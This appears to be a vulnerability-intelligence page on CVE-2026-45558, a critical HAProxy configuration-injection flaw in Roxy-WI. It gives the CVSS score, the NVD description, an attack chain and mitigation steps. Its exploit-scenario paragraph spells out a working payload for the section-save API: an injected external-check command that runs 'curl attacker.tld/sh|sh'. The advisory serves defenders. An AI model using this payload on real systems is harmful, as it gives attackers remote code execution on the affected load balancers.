What is the CVSS score of CVE-2026-45558?

CVE-2026-45558 has a CVSS 3.1 base score of 9.9 (Critical). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H.

Which versions of Roxy-WI are affected by CVE-2026-45558?

Roxy-WI versions 8.2.6.4 and prior contain a critical remote code execution vulnerability (CVE-2026-45558, CVSS 9.9) that allows authenticated low-privilege users to inject arbitrary HAProxy…

How to fix or mitigate CVE-2026-45558?

Within 24 hours: Inventory all Roxy-WI deployments and current version numbers; audit which users have low-privilege roles (≤3) with API access; implement immediate network access controls restricting API calls to section-save endpoints to trusted administrator sources only. Within 7 days: Deploy centralized logging and alerting on HAProxy configuration changes via Roxy-WI APIs; conduct access review and reduce low-privilege user accounts to absolute minimum; document all current HAProxy configurations as baseline. Within 30 days: Establish daily monitoring for vendor security updates and patch availability; develop and test upgrade strategy for all Roxy-WI instances; evaluate alternative load balancer management solutions if patches remain unavailable.

Roxy-WI CVE-2026-45558

EUVD-2026-36039 CRITICAL

Improper Input Validation (CWE-20)

2026-06-10 GitHub_M

RCE Nginx Apache

9.9

CVSS 3.1 · NVD

Severity by source

NVD PRIMARY

9.9 CRITICAL

AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Changed

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Analysis Generated

Jun 10, 2026 - 15:16 vuln.today

CVE Published

Jun 10, 2026 - 14:01 nvd

CRITICAL 9.9

DescriptionNVD

Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, the HAProxy section-save endpoints (POST /api/service/haproxy/<server_id>/section/<section_type> and the PUT / global / defaults variants) accept a JSON option field that is not validated, not escaped, and is rendered verbatim into the generated HAProxy configuration via the section.j2, global.j2, and defaults.j2 Ansible templates. Because Roxy-WI then pushes the generated config to the load balancer and runs systemctl reload haproxy, an authenticated user with role ≤ 3 (user) can inject arbitrary HAProxy directives into the config that runs on every load balancer their group manages - including option external-check + external-check command /bin/bash -c '…', which gives remote code execution on the load balancer as the haproxy user on every health-check tick. At time of publication, there are no publicly available patches.

Articles & Coverage 2

News 11 New Apache Vulnerabilities - 4 Critical, 7 High Severity Jun 10, 2026 News Critical RCE in Roxy-WI (Nginx) 8.2.6.4 - CVE-2026-45558 Jun 10, 2026

AnalysisAI

Remote code execution in Roxy-WI versions 8.2.6.4 and prior allows authenticated low-privilege users (role ≤ 3) to inject arbitrary HAProxy directives via unvalidated JSON option fields in the HAProxy section-save API endpoints, achieving command execution as the haproxy user on every managed load balancer. No public exploit has been identified at time of analysis, but the attack is straightforward given the documented injection path through the section.j2, global.j2, and defaults.j2 Ansible templates, and no vendor-released patch is available.

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon

Obtain role ≤ 3 Roxy-WI credentials

Delivery

Identify accessible HAProxy server group

Exploit

POST crafted option field to section-save endpoint

Install

Roxy-WI renders payload into haproxy.cfg via Ansible template

systemctl reload haproxy applies injected external-check command

Execute

Shell executes as haproxy user on each health-check tick

Impact

Establish persistence and pivot from load balancer

Recon

Obtain role ≤ 3 Roxy-WI credentials

Delivery

Identify accessible HAProxy server group

Exploit

POST crafted option field to section-save endpoint

Install

Roxy-WI renders payload into haproxy.cfg via Ansible template

systemctl reload haproxy applies injected external-check command

Execute

Shell executes as haproxy user on each health-check tick

Impact

Establish persistence and pivot from load balancer

Vulnerability AssessmentAI

Exploitation	Requires an authenticated Roxy-WI account with role ≤ 3 ('user' role) that has access to at least one HAProxy server group, and network reachability to the Roxy-WI API (typically the management web interface). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	The CVSS 9.9 score (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) accurately reflects high real-world risk: network-reachable, low complexity, only a low-privileged role-3 'user' account is required, no user interaction needed, and the scope change captures the pivot from the Roxy-WI app to the underlying load balancer host. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker with any role-3 user account (e.g., a low-privilege internal user, a compromised credential, or a tenant on a shared Roxy-WI instance) sends a crafted POST to /api/service/haproxy/<server_id>/section/<section_type> with an option field containing 'external-check\n external-check command /bin/bash -c "curl attacker.tld/sh\|sh"'. Roxy-WI renders this verbatim into the HAProxy config via the Ansible template, pushes it to the load balancer, and runs systemctl reload haproxy; the injected shell command then executes as the haproxy user on every health-check tick, giving the attacker persistent code execution on every load balancer in the victim's group. …
Remediation	No vendor-released patch is identified at time of analysis - the GHSA-w2x4-66jj-3597 advisory explicitly states no public patches exist. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Inventory all Roxy-WI deployments and current version numbers; audit which users have low-privilege roles (≤3) with API access; implement immediate network access controls restricting API calls to section-save endpoints to trusted administrator sources only. …

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-45552 CRITICAL Act Now

9.9 Jun 10

Privilege escalation and cross-tenant compromise in Roxy-WI versions 8.2.6.4 and prior allows any authenticated user - i

CVE-2026-45556 CRITICAL Act Now

9.9 Jun 10

Remote code execution in Roxy-WI versions 8.2.6.4 and prior allows authenticated users to write attacker-controlled cont

CVE-2026-45550 CRITICAL Act Now

9.1 Jun 10

Cross-tenant data tampering in Roxy-WI versions 8.2.6.4 and prior allows any authenticated user to silently overwrite HT

CVE-2026-45564 HIGH This Week

8.8 Jun 10

Authenticated command injection in Roxy-WI versions 8.2.6.4 and prior allows low-privileged users (role <= 3, 'user') to

CVE-2026-45549 HIGH This Week

8.5 Jun 10

Privilege escalation in Roxy-WI versions 8.2.6.4 and prior allows any authenticated user - including the lowest-privileg

CVE-2026-45558 vulnerability details – vuln.today

Back

Roxy-WI CVE-2026-45558

Severity by source

CVSS VectorNVD

Lifecycle Timeline

DescriptionNVD

Articles & Coverage 2

AnalysisAI

Unlock full vulnerability intelligence

Attack ChainAIDerived

Vulnerability AssessmentAI

Recommended ActionAI

More from same product – last 7 days

Share

External POC / Exploit Code